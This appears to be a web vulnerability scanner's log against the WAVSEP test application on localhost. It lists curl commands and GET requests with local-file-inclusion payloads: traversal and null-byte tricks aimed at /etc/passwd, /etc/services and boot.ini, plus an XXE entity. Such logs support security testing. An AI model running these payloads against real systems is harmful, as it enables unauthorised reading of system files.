GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
